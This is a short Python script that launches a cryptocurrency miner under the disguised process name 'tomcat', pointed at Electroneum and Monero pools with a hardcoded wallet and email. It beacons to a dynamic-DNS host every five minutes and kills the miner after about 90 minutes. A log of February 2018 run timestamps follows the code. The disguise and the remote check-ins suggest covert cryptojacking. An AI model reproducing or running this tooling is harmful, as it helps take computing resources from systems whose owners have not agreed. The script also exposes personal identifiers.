import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:21:07.609287
#2018-02-17 16:07:07.252326
#2018-02-17 17:55:04.666322
#2018-02-17 19:42:01.436480
#2018-02-17 21:31:01.867743
#2018-02-17 23:14:08.254766
#2018-02-18 01:01:04.518303
#2018-02-18 02:49:07.035948
#2018-02-18 04:38:06.722956
#2018-02-18 06:29:04.192036
#2018-02-18 08:18:05.874791
#2018-02-18 10:06:06.763424
#2018-02-18 11:52:07.212071
#2018-02-18 13:38:07.666599
#2018-02-18 15:28:04.086262
#2018-02-18 17:16:06.965084
#2018-02-18 19:04:05.280047
#2018-02-18 20:51:03.415904
#2018-02-18 22:38:04.304876
#2018-02-19 00:27:06.881845
#2018-02-19 02:13:04.566050
#2018-02-19 04:01:05.711012
#2018-02-19 05:44:07.460133
#2018-02-19 07:33:01.428001
#2018-02-19 09:23:06.150645
#2018-02-19 11:12:07.675419
#2018-02-19 12:59:02.104773
#2018-02-19 14:46:05.042743
#2018-02-19 16:34:10.929076
#2018-02-19 18:21:07.414999
#2018-02-19 20:07:06.986241
#2018-02-19 21:58:04.585009
#2018-02-19 23:43:05.104281
#2018-02-20 01:31:05.755921
#2018-02-20 03:19:01.968380
#2018-02-20 05:05:06.095389
#2018-02-20 06:48:01.695160
#2018-02-20 08:34:07.827753
#2018-02-20 10:18:04.709252
#2018-02-20 12:03:07.450718
#2018-02-20 13:51:07.378688
#2018-02-20 15:37:06.832217
#2018-02-20 17:23:07.748549
#2018-02-20 19:12:05.404306
#2018-02-20 21:01:02.047392
#2018-02-20 22:47:05.480424
#2018-02-21 00:31:06.056276
#2018-02-21 02:16:06.941361
#2018-02-21 04:03:08.017185
#2018-02-21 05:51:05.090238
#2018-02-21 07:39:01.580841
#2018-02-21 09:24:01.616098
#2018-02-21 11:13:08.879507
#2018-02-21 13:02:09.503106
#2018-02-21 14:50:04.170840
#2018-02-21 16:37:07.675076
#2018-02-21 18:28:01.366773
#2018-02-21 20:15:07.114177
#2018-02-21 22:03:08.683577
#2018-02-21 23:54:06.595010
#2018-02-22 01:35:08.399687
#2018-02-22 03:23:05.039523
#2018-02-22 05:10:06.392433
#2018-02-22 06:54:02.020041
#2018-02-22 08:43:02.192872
#2018-02-22 10:31:06.662391
#2018-02-22 12:17:05.719249
#2018-02-22 14:02:02.176305
#2018-02-22 16:56:13.105398
#2018-02-22 18:46:04.016522
#2018-02-22 20:37:06.745729
#2018-02-22 22:23:06.596703
#2018-02-23 00:10:07.915830
#2018-02-23 01:58:01.787418
#2018-02-23 03:44:07.392019
#2018-02-23 05:33:03.201610
#2018-02-23 07:17:06.625669
#2018-02-23 09:20:06.665034
#2018-02-23 11:25:08.350780
#2018-02-23 13:16:07.885507
#2018-02-23 15:02:05.156867
#2018-02-23 16:52:07.145148
#2018-02-23 18:41:02.060757
#2018-02-23 20:28:03.747290
#2018-02-23 22:17:05.013504
#2018-02-24 00:03:07.862709
#2018-02-24 01:52:07.973539
#2018-02-24 03:44:05.369211
#2018-02-24 05:33:07.377949
#2018-02-24 07:19:04.136339
#2018-02-24 09:09:03.535652
#2018-02-24 10:44:03.787939
#2018-02-24 12:26:07.328541
#2018-02-24 14:03:06.608140
#2018-02-24 15:30:04.119020
#2018-02-24 17:16:07.867628
#2018-02-24 18:48:06.343635
#2018-02-24 20:19:01.517399
#2018-02-24 21:48:01.961319
#2018-02-25 00:28:05.284334
#2018-02-25 02:25:07.935665
#2018-02-25 06:07:07.370147
#2018-02-25 11:38:01.706640